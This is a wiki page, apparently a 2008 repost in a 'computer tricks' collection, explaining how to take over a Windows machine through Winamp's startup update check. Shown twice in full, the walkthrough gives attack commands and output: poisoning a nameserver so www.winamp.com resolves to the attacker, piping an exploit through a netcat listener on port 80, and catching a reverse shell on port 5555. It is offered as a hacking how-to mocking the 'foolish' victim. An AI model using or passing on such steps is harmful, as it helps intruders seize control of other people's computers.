Sign in or 
Share this
How to hack through winamp
How Hackers Take over Through Winamp!!
Winamp has an option, enabled by default, which checks on startup for
the latest version from www.winamp.com and will then notify the user of
a possible upgrade via messagebox..
Unfortunately, if it were to receive a huge response, the thread
parsing the data is thrown into an infinite loop and eventually the
exception dispatcher is called.. and then like most of the time under
windows, a big, bad, overflow occurs.. i am attaching the real example
Sample attack
=============
Nameserver - 192.168.0.1
attacker - 192.168.1.2
victim (windows machine) - 192.168.0.2
1) attacker poisons nameserver cache
192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2
2) victim is now resolving www.winamp.com to attacker machine
192.168.0.2:
C:>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1
Name: www.winamp.com
Address: 192.168.1.2
3) attacker fires up exploit as web daemon
192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80
4) attacker waits for connect-back by exploit
192.168.1.2:
x@x:~$ nc -l -p 5555
5) foolish winamp user opens winamp!
192.168.0.2:
opens winamp, prepares for The Weather Girls - It\'s
Raining Men.mp3
6) BOOJAH!@
192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
/// control over machine taken
Winamp has an option, enabled by default, which checks on startup for
the latest version from www.winamp.com and will then notify the user of
a possible upgrade via messagebox..
Unfortunately, if it were to receive a huge response, the thread
parsing the data is thrown into an infinite loop and eventually the
exception dispatcher is called.. and then like most of the time under
windows, a big, bad, overflow occurs.. i am attaching the real example
Sample attack
=============
Nameserver - 192.168.0.1
attacker - 192.168.1.2
victim (windows machine) - 192.168.0.2
1) attacker poisons nameserver cache
192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2
2) victim is now resolving www.winamp.com to attacker machine
192.168.0.2:
C:>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1
Name: www.winamp.com
Address: 192.168.1.2
3) attacker fires up exploit as web daemon
192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80
4) attacker waits for connect-back by exploit
192.168.1.2:
x@x:~$ nc -l -p 5555
5) foolish winamp user opens winamp!
192.168.0.2:
opens winamp, prepares for The Weather Girls - It\'s
Raining Men.mp3
6) BOOJAH!@
192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
/// control over machine taken
sanjivnidamboor |
Latest page update: made by sanjivnidamboor
, Jun 4 2008, 6:24 AM EDT
(about this update
About This Update
Edited by sanjivnidamboor
198 words added view changes - complete history) |
|
Keyword tags:
allcomputertricks
how to hack through winamp
More Info: links to this page
|
There are no threads for this page.
Be the first to start a new thread.
